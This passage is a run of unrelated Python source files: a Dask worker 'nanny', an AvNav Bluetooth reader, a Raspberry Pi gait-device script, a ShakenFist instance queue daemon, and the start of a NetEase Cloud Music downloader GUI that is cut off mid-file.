await self.process.start()
except OSError:
logger.exception("Nanny failed to start process", exc_info=True)
self.process.terminate()
return
msg = await self._wait_until_connected(uid)
if not msg:
return self.status
self.worker_address = msg["address"]
self.worker_dir = msg["dir"]
assert self.worker_address
        self.status = Status.running
self.running.set()
init_q.close()
return self.status
def _on_exit(self, proc):
if proc is not self.process:
# Ignore exit of old process instance
return
self.mark_stopped()
def _death_message(self, pid, exitcode):
assert exitcode is not None
if exitcode == 255:
return "Worker process %d was killed by unknown signal" % (pid,)
elif exitcode >= 0:
return "Worker process %d exited with status %d" % (pid, exitcode)
else:
return "Worker process %d was killed by signal %d" % (pid, -exitcode)
def is_alive(self):
return self.process is not None and self.process.is_alive()
@property
def pid(self):
return self.process.pid if self.process and self.process.is_alive() else None
def mark_stopped(self):
if self.status != Status.stopped:
r = self.process.exitcode
assert r is not None
if r != 0:
msg = self._death_message(self.process.pid, r)
logger.info(msg)
self.status = Status.stopped
self.stopped.set()
# Release resources
self.process.close()
self.init_result_q = None
self.child_stop_q = None
self.process = None
# Best effort to clean up worker directory
if self.worker_dir and os.path.exists(self.worker_dir):
shutil.rmtree(self.worker_dir, ignore_errors=True)
self.worker_dir = None
# User hook
if self.on_exit is not None:
self.on_exit(r)
async def kill(self, timeout=2, executor_wait=True):
"""
Ensure the worker process is stopped, waiting at most
*timeout* seconds before terminating it abruptly.
"""
loop = IOLoop.current()
deadline = loop.time() + timeout
if self.status == Status.stopped:
return
if self.status == Status.stopping:
await self.stopped.wait()
return
assert self.status in (Status.starting, Status.running)
self.status = Status.stopping
process = self.process
self.child_stop_q.put(
{
"op": "stop",
"timeout": max(0, deadline - loop.time()) * 0.8,
"executor_wait": executor_wait,
}
)
await asyncio.sleep(0) # otherwise we get broken pipe errors
self.child_stop_q.close()
while process.is_alive() and loop.time() < deadline:
await asyncio.sleep(0.05)
if process.is_alive():
logger.warning(
"Worker process still alive after %d seconds, killing", timeout
)
try:
await process.terminate()
except Exception as e:
logger.error("Failed to kill worker process: %s", e)
async def _wait_until_connected(self, uid):
delay = 0.05
while True:
if self.status != Status.starting:
return
try:
msg = self.init_result_q.get_nowait()
except Empty:
await asyncio.sleep(delay)
continue
if msg["uid"] != uid: # ensure that we didn't cross queues
continue
if "exception" in msg:
logger.error(
"Failed while trying to start worker process: %s", msg["exception"]
)
await self.process.join()
raise msg["exception"]
else:
return msg
@classmethod
def _run(
cls,
worker_kwargs,
worker_start_args,
silence_logs,
init_result_q,
child_stop_q,
uid,
env,
config,
Worker,
): # pragma: no cover
os.environ.update(env)
dask.config.set(config)
try:
from dask.multiprocessing import initialize_worker_process
except ImportError: # old Dask version
pass
else:
initialize_worker_process()
if silence_logs:
logger.setLevel(silence_logs)
IOLoop.clear_instance()
loop = IOLoop()
loop.make_current()
worker = Worker(**worker_kwargs)
async def do_stop(timeout=5, executor_wait=True):
try:
await worker.close(
report=False,
nanny=False,
executor_wait=executor_wait,
timeout=timeout,
)
finally:
loop.stop()
def watch_stop_q():
"""
Wait for an incoming stop message and then stop the
worker cleanly.
"""
while True:
try:
msg = child_stop_q.get(timeout=1000)
except Empty:
pass
else:
child_stop_q.close()
assert msg.pop("op") == "stop"
loop.add_callback(do_stop, **msg)
break
t = threading.Thread(target=watch_stop_q, name="Nanny stop queue watch")
t.daemon = True
t.start()
async def run():
"""
Try to start worker and inform parent of outcome.
"""
try:
await worker
except Exception as e:
logger.exception("Failed to start worker")
init_result_q.put({"uid": uid, "exception": e})
init_result_q.close()
else:
try:
assert worker.address
except ValueError:
pass
else:
init_result_q.put(
{
"address": worker.address,
"dir": worker.local_directory,
"uid": uid,
}
)
init_result_q.close()
await worker.finished()
logger.info("Worker closed")
try:
loop.run_sync(run)
except (TimeoutError, gen.TimeoutError):
# Loop was stopped before wait_until_closed() returned, ignore
pass
except KeyboardInterrupt:
# At this point the loop is not running thus we have to run
# do_stop() explicitly.
loop.run_sync(do_stop)
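# Illustrative usage sketch (the scheduler address and keyword values are
# assumptions for the example, not taken from this module): a Nanny is awaitable
# and supervises a single worker process, restarting it if it exits unexpectedly.
#
#   import asyncio
#
#   async def _demo():
#       nanny = await Nanny("tcp://127.0.0.1:8786", nthreads=2, memory_limit="1GB")
#       try:
#           await asyncio.sleep(60)  # the nanny restarts the worker if it dies
#       finally:
#           await nanny.close()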
|
bluetoothhandler.py
|
# -*- coding: utf-8 -*-
# vim: ts=2 sw=2 et ai
###############################################################################
# Copyright (c) 2012,2021 Andreas Vogel andreas@wellenvogel.net
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# parts from this software (AIS decoding) are taken from the gpsd project
# so refer to this BSD licencse also (see ais.py) or omit ais.py
###############################################################################
hasBluetooth=False
try:
import bluetooth
hasBluetooth=True
except ImportError:
pass
from socketreaderbase import *
import avnav_handlerList
if hasBluetooth:
class OurBtSocket(bluetooth.BluetoothSocket):
def __init__(self, proto=bluetooth.RFCOMM, _sock=None):
super().__init__(proto, _sock)
self._closed=False
def connect(self, addrport):
rt=super().connect(addrport)
if self._closed:
raise Exception("socket closed")
return rt
def send(self, data):
if self._closed:
raise Exception("socket closed")
return super().send(data)
def recv(self, numbytes):
if self._closed:
raise Exception("socket closed")
try:
return super().recv(numbytes)
except Exception as e:
if isinstance(e,bluetooth.btcommon.BluetoothError):
if re.match("timed* *out",str(e)):
raise socket.timeout()
AVNLog.info("bluetooth socket error: ",str(e))
raise
def close(self):
self._closed=True
return super().close()
else:
class OurBtSocket:
pass
#a Worker for reading bluetooth devices
#it uses a feeder to handle the received data
class AVNBlueToothReader(AVNWorker,SocketReader):
@classmethod
def getConfigName(cls):
return "AVNBlueToothReader"
@classmethod
def getConfigParam(cls, child=None):
rt=[
WorkerParameter('maxDevices',5,description="maximal number of bluetooth devices",type=WorkerParameter.T_NUMBER),
      WorkerParameter('deviceList','',description="comma-separated list of device addresses; if set, only connect to those devices"),
WorkerParameter('feederName','',editable=False,description="if set, use this feeder"),
WorkerParameter('filter','',type=WorkerParameter.T_FILTER)
]
return rt
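  # Example (made-up addresses, for illustration only): setting
  # deviceList="00:11:22:33:44:55,66:77:88:99:AA:BB" restricts the reader to
  # exactly those two paired devices, while an empty deviceList connects to any
  # discovered serial-port service, up to maxDevices connections.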
@classmethod
def createInstance(cls, cfgparam):
if not hasBluetooth:
raise Exception("no bluetooth installed, cannot run %s"%(cls.getConfigName()))
return AVNBlueToothReader(cfgparam)
@classmethod
def canEdit(cls):
return True
@classmethod
def canDisable(cls):
return True
def _closeSockets(self):
for host,sock in list(self.addrmap.items()):
try:
sock.close()
except Exception as e:
AVNLog.error("error closing bt socket %s: %s ",host,str(e))
def updateConfig(self, param, child=None):
super().updateConfig(param, child)
self._closeSockets()
def stop(self):
super().stop()
self._closeSockets()
def __init__(self,cfgparam):
AVNWorker.__init__(self, cfgparam)
self.maplock=threading.Lock()
self.addrmap={}
#return True if added
def checkAndAddAddr(self,addr,socket):
rt=False
maxd=self.getIntParam('maxDevices')
self.maplock.acquire()
if len(self.addrmap) < maxd:
if not addr in self.addrmap:
self.addrmap[addr]=socket
rt=True
self.maplock.release()
return rt
def removeAddr(self,addr):
self.maplock.acquire()
try:
self.addrmap.pop(addr)
except:
pass
self.maplock.release()
#a thread to open a bluetooth socket and read from it until
#disconnected
def readBT(self,host,port):
infoName="BTReader-%s"%(host)
    threading.current_thread().setName("%s-reader-%s"%(self.getName(),host))
try:
sock=OurBtSocket( bluetooth.RFCOMM )
if not self.checkAndAddAddr(host,sock):
try:
sock.close()
except:
pass
return
AVNLog.debug("started bluetooth reader thread for %s:%s",str(host),str(port))
self.setInfo(infoName, "connecting", WorkerStatus.STARTED)
sock.connect((host, port))
AVNLog.info("bluetooth connection to %s established",host)
self.readSocket(sock,infoName,self.getSourceName(host),self.getParamValue('filter'))
sock.close()
except Exception as e:
AVNLog.debug("exception from bluetooth device: %s",traceback.format_exc())
try:
sock.close()
except:
pass
AVNLog.info("disconnected from bluetooth device ")
self.setInfo(infoName, "disconnected", WorkerStatus.INACTIVE)
self.removeAddr(host)
self.deleteInfo(infoName)
#this is the main thread - this executes the bluetooth polling
def run(self):
self.wait(2) # give a chance to have the socket open...
#now start an endless loop with BT discovery...
self.setInfo('main', "discovering", WorkerStatus.RUNNING)
while not self.shouldStop():
service_matches=[]
try:
AVNLog.debug("starting BT discovery")
service_matches = bluetooth.find_service(uuid = bluetooth.SERIAL_PORT_CLASS)
except Exception as e:
AVNLog.warn("exception when querying BT services %s, retrying after 10s",traceback.format_exc())
if self.shouldStop():
return
if len(service_matches) == 0:
self.wait(10)
continue
AVNLog.ld("found bluetooth devices",service_matches)
filter=[]
      filterstr=self.getStringParam('deviceList')
if not filterstr is None and not filterstr=='':
filter=filterstr.split(',')
for match in service_matches:
port = match["port"]
name = match["name"]
host = match["host"]
found=False
if len(filter) > 0:
if host in filter:
found=True
else:
AVNLog.debug("ignoring device %s as it is not in the list #%s#",host,filterstr)
else:
found=True
if found:
try:
AVNLog.info("found new bluetooth device %s",host)
handler=threading.Thread(target=self.readBT,args=(host,port))
handler.daemon=True
handler.start()
except Exception as e:
AVNLog.warn("unable to start BT handler %s",traceback.format_exc())
self.removeAddr(host)
self.wait(10)
avnav_handlerList.registerHandler(AVNBlueToothReader)
|
Main.py
|
from Gaitmate import Gaitmate
from HaqPi.Component.JuiceBoxListener import JuiceBoxListener
import resetGPIO
from multiprocessing import Process, Pipe
import time
from InitSettings import InitSettings as settings
import dataCollector
# PINOUT
#
# Buzzer: PIN 11 BCM 17
# Buzzer2: PIN 36 BCM 16
# Haptic: PIN 13 BCM 27
# LED: PIN 22 BCM 25
# Button: PIN 31 BCM 6
# Laser: PIN 29 BCM 5
# JBox: PIN 37 BCM 26
##
def main():
controller = Gaitmate(0x68, 17, 27, 6, 5, 25)
jBoxListener = JuiceBoxListener(settings.juiceBoxPin, controller)
recv_end, send_end = Pipe(False)
p1 = Process(target=controller.ledAction().breathe,
args=(settings.startupDuration+1, 0.05))
p1.start()
def buttonListener(send_end):
timerEnd = time.time() + settings.startupDuration
while (time.time() < timerEnd):
time.sleep(0.1)
if (controller.buttonAction().isPressed()):
send_end.send(True)
return
send_end.send(False)
buttonListener(send_end)
if (recv_end.recv()):
p1.terminate()
controller.buzzerAction().metronome(0.1, 0.3, 0.05)
dataCollector.execute()
else:
controller.execute()
if __name__ == "__main__":
    main()
|
queues.py
|
import copy
import multiprocessing
import re
import requests
import setproctitle
import time
from shakenfist import config
from shakenfist.daemons import daemon
from shakenfist import db
from shakenfist import exceptions
from shakenfist.images import Image
from shakenfist import logutil
from shakenfist import net
from shakenfist import scheduler
from shakenfist import util
from shakenfist import virt
from shakenfist.tasks import (QueueTask,
DeleteInstanceTask,
ErrorInstanceTask,
FetchImageTask,
InstanceTask,
PreflightInstanceTask,
StartInstanceTask,
)
LOG, _ = logutil.setup(__name__)
def handle(jobname, workitem):
log = LOG.withField('workitem', jobname)
log.info('Processing workitem')
setproctitle.setproctitle(
'%s-%s' % (daemon.process_name('queues'), jobname))
instance_uuid = None
task = None
try:
for task in workitem.get('tasks', []):
if not QueueTask.__subclasscheck__(type(task)):
raise exceptions.UnknownTaskException(
'Task was not decoded: %s' % task)
if (InstanceTask.__subclasscheck__(type(task)) or
isinstance(task, FetchImageTask)):
instance_uuid = task.instance_uuid()
if instance_uuid:
log_i = log.withInstance(instance_uuid)
else:
log_i = log
log_i.withField('task_name', task.name()).info('Starting task')
# TODO(andy) Should network events also come through here eventually?
# Then this can be generalised to record events on networks/instances
# TODO(andy) This event should be recorded when it is recorded as
# dequeued in the DB. Currently it's reporting action on the item
# and calling it 'dequeue'.
if instance_uuid:
# TODO(andy) move to QueueTask
db.add_event('instance', instance_uuid, task.pretty_task_name(),
'dequeued', None, 'Work item %s' % jobname)
if isinstance(task, FetchImageTask):
image_fetch(task.url(), instance_uuid)
elif isinstance(task, PreflightInstanceTask):
redirect_to = instance_preflight(instance_uuid, task.network())
if redirect_to:
log_i.info('Redirecting instance start to %s'
% redirect_to)
db.place_instance(instance_uuid, redirect_to)
db.enqueue(redirect_to, workitem)
return
elif isinstance(task, StartInstanceTask):
instance_start(instance_uuid, task.network())
db.update_instance_state(instance_uuid, 'created')
db.enqueue('%s-metrics' % config.parsed.get('NODE_NAME'), {})
elif isinstance(task, DeleteInstanceTask):
try:
instance_delete(instance_uuid)
db.update_instance_state(instance_uuid, 'deleted')
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
elif isinstance(task, ErrorInstanceTask):
try:
instance_delete(instance_uuid)
db.update_instance_state(instance_uuid, 'error')
if task.error_msg():
db.update_instance_error_message(
instance_uuid, task.error_msg())
db.enqueue('%s-metrics' %
config.parsed.get('NODE_NAME'), {})
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
else:
log_i.withField('task', task).error('Unhandled task - dropped')
log_i.info('Task complete')
except exceptions.ImageFetchTaskFailedException as e:
# Usually caused by external issue and not an application error
log.info('Fetch Image Error: %s', e)
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'failed queue task: %s' % e)
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'failed queue task: %s' % e)
finally:
db.resolve(config.parsed.get('NODE_NAME'), jobname)
if instance_uuid:
db.add_event('instance', instance_uuid, 'tasks complete',
'dequeued', None, 'Work item %s' % jobname)
log.info('Completed workitem')
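# Illustrative shape only (nothing beyond the "tasks" key is assumed here): a
# work item handled above is a dict whose "tasks" entry is a list of QueueTask
# subclasses, for example a PreflightInstanceTask followed by a
# StartInstanceTask for the same instance.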
def image_fetch(url, instance_uuid):
instance = None
if instance_uuid:
instance = virt.from_db(instance_uuid)
try:
# TODO(andy): Wait up to 15 mins for another queue process to download
# the required image. This will be changed to queue on a
# "waiting_image_fetch" queue but this works now.
with db.get_lock('image', config.parsed.get('NODE_NAME'),
Image.calc_unique_ref(url), timeout=15*60,
op='Image fetch') as lock:
img = Image.from_url(url)
img.get([lock], instance)
db.add_event('image', url, 'fetch', None, None, 'success')
except (exceptions.HTTPError, requests.exceptions.RequestException) as e:
LOG.withField('image', url).warning('Failed to fetch image')
if instance_uuid:
db.enqueue_instance_error(instance_uuid,
'Image fetch failed: %s' % e)
# Clean common problems to store in events
msg = str(e)
re_conn_err = re.compile(r'.*NewConnectionError\(\'\<.*\>: (.*)\'')
m = re_conn_err.match(msg)
if m:
msg = m.group(1)
db.add_event('image', url, 'fetch', None, None, 'Error: '+msg)
raise exceptions.ImageFetchTaskFailedException(
'Failed to fetch image %s' % url)
def instance_preflight(instance_uuid, network):
db.update_instance_state(instance_uuid, 'preflight')
s = scheduler.Scheduler()
instance = virt.from_db(instance_uuid)
try:
s.place_instance(
instance, network, candidates=[config.parsed.get('NODE_NAME')])
return None
except exceptions.LowResourceException as e:
db.add_event('instance', instance_uuid,
'schedule', 'retry', None,
'insufficient resources: ' + str(e))
if instance.db_entry.get('placement_attempts') > 3:
raise exceptions.AbortInstanceStartException(
'Too many start attempts')
try:
if instance.db_entry.get('requested_placement'):
candidates = [instance.db_entry.get('requested_placement')]
else:
candidates = []
for node in s.metrics.keys():
if node != config.parsed.get('NODE_NAME'):
candidates.append(node)
candidates = s.place_instance(instance, network,
candidates=candidates)
return candidates[0]
except exceptions.LowResourceException as e:
db.add_event('instance', instance_uuid,
'schedule', 'failed', None,
'insufficient resources: ' + str(e))
# This raise implies delete above
raise exceptions.AbortInstanceStartException(
'Unable to find suitable node')
def instance_start(instance_uuid, network):
with db.get_lock(
'instance', None, instance_uuid, ttl=900, timeout=120,
op='Instance start') as lock:
instance = virt.from_db(instance_uuid)
# Collect the networks
nets = {}
for netdesc in network:
if netdesc['network_uuid'] not in nets:
n = net.from_db(netdesc['network_uuid'])
if not n:
db.enqueue_instance_error(instance_uuid, 'missing network')
return
nets[netdesc['network_uuid']] = n
# Create the networks
with util.RecordedOperation('ensure networks exist', instance):
for network_uuid in nets:
n = nets[network_uuid]
n.create()
n.ensure_mesh()
n.update_dhcp()
# Now we can start the instance
libvirt = util.get_libvirt()
try:
with util.RecordedOperation('instance creation',
instance):
instance.create(lock=lock)
except libvirt.libvirtError as e:
code = e.get_error_code()
if code in (libvirt.VIR_ERR_CONFIG_UNSUPPORTED,
libvirt.VIR_ERR_XML_ERROR):
db.enqueue_instance_error(instance_uuid,
'instance failed to start: %s' % e)
return
for iface in db.get_instance_interfaces(instance_uuid):
db.update_network_interface_state(iface['uuid'], 'created')
def instance_delete(instance_uuid):
with db.get_lock('instance', None, instance_uuid, timeout=120,
op='Instance delete'):
db.add_event('instance', instance_uuid,
'queued', 'delete', None, None)
# Create list of networks used by instance
instance_networks = []
for iface in list(db.get_instance_interfaces(instance_uuid)):
if not iface['network_uuid'] in instance_networks:
instance_networks.append(iface['network_uuid'])
# Create list of networks used by all other instances
host_networks = []
for inst in list(
db.get_instances(only_node=config.parsed.get('NODE_NAME'))):
if not inst['uuid'] == instance_uuid:
for iface in db.get_instance_interfaces(inst['uuid']):
if not iface['network_uuid'] in host_networks:
host_networks.append(iface['network_uuid'])
instance_from_db_virt = virt.from_db(instance_uuid)
if instance_from_db_virt:
instance_from_db_virt.delete()
# Check each network used by the deleted instance
for network in instance_networks:
n = net.from_db(network)
if n:
# If network used by another instance, only update
if network in host_networks:
with util.RecordedOperation('deallocate ip address',
instance_from_db_virt):
n.update_dhcp()
else:
# Network not used by any other instance therefore delete
with util.RecordedOperation('remove network', n):
n.delete()
class Monitor(daemon.Daemon):
def run(self):
workers = []
LOG.info('Starting Queues')
libvirt = util.get_libvirt()
conn = libvirt.open(None)
present_cpus, _, _ = conn.getCPUMap()
while True:
try:
for w in copy.copy(workers):
if not w.is_alive():
w.join(1)
workers.remove(w)
if len(workers) < present_cpus / 2:
jobname, workitem = db.dequeue(
config.parsed.get('NODE_NAME'))
else:
workitem = None
if not workitem:
time.sleep(0.2)
continue
p = multiprocessing.Process(
target=handle, args=(jobname, workitem,),
name='%s-worker' % daemon.process_name('queues'))
p.start()
workers.append(p)
except Exception as e:
util.ignore_exception(daemon.process_name('queues'), e)
|
NetEaseMusicUI.pyw
|
#! /usr/bin/env python3
# -*- coding:utf-8 -*-
# @author: AnarL. (anar930906@gmail.com)
# @Modified by robonxt (on github)
# @environment: Python3 with requests + unicodedata
# @description: This program makes it easy to download songs from NetEase Cloud Music; all you need is the song's page URL. Individually paid songs cannot be downloaded.
#               It is intended for learning and personal study only; any commercial use is strictly forbidden, and the author accepts no liability for legal disputes arising from it.
#               Please respect copyright and stay copyright-aware.
# @README: Adding cover art requires the lame tool; if it is not installed, install it with brew install lame or by other means. Running on Windows is not supported yet.
# @license: MIT
# Pyinstaller error
# solution: https://stackoverflow.com/questions/48876156/pyinstaller-fails-to-import-site-module-in-python3-on-macosx
from tkinter import filedialog
from tkinter import LEFT
from tkinter import ttk
from tkinter import scrolledtext
from enum import Enum
import threading
import tkinter as tk
import re
import requests
import json
import os
import subprocess
import sys
import time
import unicodedata # New!
import locale
from config import http_error
from config import music_genre
from Crypto.Cipher import AES
import base64
url_type = Enum(
"url_type",
("url_type_playlist", "url_type_album", "url_type_mv", "url_type_single"),
)
__DATE__ = "2021-02-10"
__VERSION__ = "v1.2"
__AUTHOR__ = "AnarL. (anar930906@gmail.com)"
__AUTHOR_MODDER__ = "robonxt (on github)"
__TRANSLATIONS__ = "ignaciocastro, robonxt"
URL_TYPE_KEY = "url_type"
URL_TYPE_SINGLE = "single"
URL_TYPE_LIST = "playlist"
URL_TYPE_VIDEO = "video"
LIST_RANGE_KEY = "list_range"
ADD_TO_ITUNES_KEY = "add_to_itunes"
global FOLDER_PATH_KEY
FOLDER_PATH_KEY = os.path.expanduser("~\\NetEaseMusic Downloads\\")
global URL_KEY
URL_KEY = "url"
# This is the string for the User Agent. Seems to work well
# New!
GLOBAL_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
messages_queue = []
def get_genre_code(genre):
if genre in music_genre.keys():
return music_genre[genre]
return 13
def get_params(text):
first_key = "0CoJUm6Qyw8W8jud".encode("utf-8")
second_key = "FFFFFFFFFFFFFFFF".encode("utf-8")
h_encText = AES_encrypt(text, first_key)
h_encText = AES_encrypt(h_encText, second_key)
return h_encText
def get_encSecKey():
encSecKey = (
"257348aecb5e556c066de214e5"
"31faadd1c55d814f9be95fd06d6bf"
"f9f4c7a41f831f6394d5a3fd2e388"
"1736d94a02ca919d952872e7d0a50e"
"bfa1769a7a62d512f5f1ca21aec60b"
"c3819a9c3ffca5eca9a0dba6d6f7249"
"b06f5965ecfff3695b54e1c28f3f624"
"750ed39e7de08fc8493242e26dbc4484a01c76f739e135637c"
)
return encSecKey
def AES_encrypt(text, key):
iv = "0102030405060708".encode("utf-8")
pad = 16 - len(text) % 16
text = (text + pad * chr(pad)).encode("utf-8")
encryptor = AES.new(key, AES.MODE_CBC, iv=iv)
encrypt_text = encryptor.encrypt(text)
encrypt_text = base64.b64encode(encrypt_text)
encrypt_text = str(encrypt_text, encoding="utf-8")
return encrypt_text
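# Illustrative note (the numbers are a worked example, not API constants):
# get_params() above runs AES-128-CBC twice over the JSON payload, first with the
# fixed key and then with the all-'F' key, base64-encoding the ciphertext after
# each pass. The manual padding mimics PKCS#7: a 41-character payload gets 7
# bytes of chr(7) appended, since 16 - 41 % 16 == 7.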
def get_response(url):
ua = GLOBAL_UA
res = requests.get(url, headers={"User-Agent": ua})
if res.status_code != 200:
messages_queue.append(f"Network Error: {http_error[res.status_code]}")
messages_queue.append(url)
return json.loads(res.text)
def extract_id(input_url):
messages_queue.append("Matching ID...")
match = re.search(r"id=\d{2,12}", input_url)
if match:
messages_queue.append(f"Obtain ID: {match.group(0)[3:]}")
return match.group(0)[3:]
return None
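# Illustrative example (URL and id are made up): the regex above pulls the
# numeric id out of a NetEase link, e.g.
#   extract_id("http://music.163.com/#/song?id=123456")  ->  "123456"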
def get_song_name_album_poster(type_id):
api = "http://music.163.com/api/song/detail?ids=[{}]".format(type_id)
json_obj = get_response(api)
if not json_obj:
messages_queue.append("❌ :Failed to get song details!")
return None
song_obj = json_obj["songs"][0]
song_name = song_obj["name"]
artists = song_obj["artists"]
singers = []
for ar in artists:
singers.append(ar["name"])
album_obj = None
if "al" in song_obj.keys():
album_obj = song_obj["al"]
elif "album" in song_obj.keys():
album_obj = song_obj["album"]
album = album_obj["name"]
year = year_of_timestamp(album_obj["publishTime"] / 1000)
track = song_obj["no"]
poster = album_obj["picUrl"]
br = get_music_best_bitrate(song_obj)
obj = Music(song_name, singers, album, year, track, poster, br)
return obj
def get_music_best_bitrate(song_obj):
br = 96000
if "hMusic" in song_obj and song_obj["hMusic"] is not None:
br = song_obj["hMusic"]["bitrate"]
elif "mMusic" in song_obj and song_obj["mMusic"] is not None:
br = song_obj["mMusic"]["bitrate"]
elif "lMusic" in song_obj and song_obj["lMusic"] is not None:
br = song_obj["lMusic"]["bitrate"]
elif "bMusic" in song_obj and song_obj["bMusic"] is not None:
br = song_obj["bMusic"]["bitrate"]
return br
def get_max_size(size_keys):
max_size = 0
for key in size_keys:
if int(key) > max_size:
max_size = int(key)
return str(max_size)
def get_mv_info(type_id):
api = "https://api.imjad.cn/cloudmusic/?type=mv&id={}".format(type_id)
json_obj = get_response(api)
if not json_obj:
messages_queue.append("❌ :Failed to get MV details!")
return None
mv_info = json_obj["data"]
size_keys = mv_info["brs"].keys()
default_mv_url = mv_info["brs"][get_max_size(size_keys)]
mv_name = mv_info["name"]
return (default_mv_url, mv_name)
def get_music_url_with_official_api(type_id, br):
# This section is for test official encryption.
messages_queue.append("Downloading song from official API...")
first_param = '{ids:"[%s]", br:"%s", csrf_token:""}' % (type_id, br)
data = {
"params": get_params(first_param).encode("utf-8"),
"encSecKey": get_encSecKey(),
}
ua = GLOBAL_UA
he = {
"Referer": "http://music.163.com",
"Host": "music.163.com",
"User-Agent": ua,
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
}
res = None
try:
url = "http://music.163.com/weapi/song/enhance/player/url?csrf_token="
res = requests.post(url, headers=he, data=data)
except Exception as e:
messages_queue.append(e)
#
d = json.loads(res.text)
if d["code"] == 200:
return d["data"][0]["url"]
return None
def get_music_url_with_3rd_party_api(type_id, br):
messages_queue.append("Downloading song from 3rd party API...")
api = "https://api.imjad.cn/cloudmusic?type=song&id={}&br={}".format(type_id, br)
json_obj = get_response(api)
if not json_obj:
messages_queue.append("❌ :Response Error")
return None
return json_obj["data"][0]["url"]
def get_playlist_songs(type_id, folder="", range=""):
api = "http://music.163.com/api/playlist/detail?id={}".format(type_id)
json_obj = get_response(api)
if not json_obj:
messages_queue.append("❌ :Response Error")
return
tracks = extract_playlist_ids(json_obj["result"]["tracks"])
# messages_queue.append(tracks)
idx = 1
total = len(tracks)
if len(range) == 0:
for track in tracks:
messages_queue.append(
"! Downloading songs from playlist ({}/{}) !".format(idx, total)
)
url = "http://music.163.com/#/song?id={}".format(track)
download_music(url, folder=folder)
time.sleep(1)
idx += 1
else:
for index in string_to_list(range):
track = tracks[index - 1]
messages_queue.append(
"! Downloading songs from range ({}/{}) !".format(index, len(tracks))
)
url = "http://music.163.com/#/song?id={}".format(track)
download_music(url, folder=folder)
time.sleep(1)
def get_album_songs(type_id, folder=""):
api = "https://api.imjad.cn/cloudmusic/?type=album&id={}".format(type_id)
json_obj = get_response(api)
if not json_obj:
messages_queue.append("❌ :Response Error")
return
tracks = extract_playlist_ids(json_obj["songs"])
album_name = json_obj["album"]["name"]
idx = 1
total = len(tracks)
for track in tracks:
messages_queue.append(
"! Downloading songs from album 【{}】 ({}/{}) !".format(
album_name, idx, total
)
)
url = "http://music.163.com/#/song?id={}".format(track)
download_music(url, folder)
time.sleep(1)
idx += 1
def extract_playlist_ids(tracks_json):
ret_tracks = []
for track in tracks_json:
ret_tracks.append(track["id"])
return ret_tracks
def download_playlist(url, folder="", range=""):
type_id = extract_id(url)
messages_queue.append("Start parsing song list info...")
get_playlist_songs(type_id, folder=folder, range=range)
def download_album(url, folder=""):
type_id = extract_id(url)
messages_queue.append("Start parsing album info...")
get_album_songs(type_id, folder=folder)
def download_mv(url, folder=""):
# pattern = https://music.163.com/#/mv?id={}
messages_queue.append("Downloading MV...")
type_id = extract_id(url)
if not type_id:
messages_queue.append("❌ :Parsing of MV ID failed")
return
(mv_url, mv_name) = get_mv_info(type_id)
download_file(mv_url, folder=folder, export_file_name=mv_name)
def download_music(url, folder=""):
# pattern = http://music.163.com/#/song?id={}
if len(folder) > 0 and not os.path.exists(folder):
os.mkdir(folder)
type_id = extract_id(url)
if not type_id:
messages_queue.append("❌ :Parsing of song or playlist ID failed")
return
music_obj = get_song_name_album_poster(type_id)
    if not music_obj or not music_obj.title:
return
#
#
# Testing!
global music_file_safe
music_file_safe = slugify(music_obj.title, True)
#
#
#
messages_queue.append("Downloading music:")
url = get_music_url_with_official_api(type_id, music_obj.br)
if url is None:
url = get_music_url_with_3rd_party_api(type_id, music_obj.br)
# Original:
# audio = download_file(url, folder=folder, export_file_name=music_obj.title)
#
# messages_queue.append('audio = ...'))
audio = download_file(url, folder=folder, export_file_name=music_file_safe)
# messages_queue.append('OK'))
if not audio:
audio = try_get_file_in_qq_music(music_obj.title, music_obj.artists)
if not audio:
return
messages_queue.append("Downloading Coverart:")
#
#
#
# poster = download_file(music_obj.poster, folder=folder, export_file_name=music_obj.title)
poster = download_file(
music_obj.poster, folder=folder, export_file_name=music_file_safe
)
#
#
#
messages_queue.append("Adding Coverart:")
audio_name = ""
if hasattr(audio, "name"):
audio_name = audio.name
else:
audio_name = audio
#
#
# Testing!
# Original:
# messages_queue.append('Before add_poster'))
add_poster(
poster.name,
music_obj.title,
music_obj.artists,
music_obj.album,
music_obj.year,
music_obj.track,
audio_name,
music_obj.br,
)
# messages_queue.append('OK'))
QQ_music_search_tip_api = (
    "https://c.y.qq.com/soso/fcgi-bin"
    "/client_search_cp?ct=24&qqmusic_ver=1298"
    "&new_json=1&remoteplace=txt.yqq.song"
    "&searchid=56069080114511262&t=0"
    "&aggr=1&cr=1&catZhida=1&lossless=0"
    "&flag_qc=0&p={page}&n=20&w={song_name}"
    "&g_tk=5381&loginUin=0&hostUin=0"
    "&format=json&inCharset=utf-8"
    "&outCharset=utf-8&notice=0&platform=yqq&needNewCode=0"
)
QQ_music_song_info_api = (
    "https://c.y.qq.com/base/fcgi-bin/fcg_music_express_mobile3.fcg"
    "?g_tk=63395543&hostUin=0&format=json&inCharset=utf-8"
    "&outCharset=utf-8&notice=0&platform=yqq&needNewCode=0"
    "&cid=205361747&songmid={song_id}"
    "&filename=C400{song_id}.m4a&guid=9362313912"
)
QQ_music_song_dl_api = (
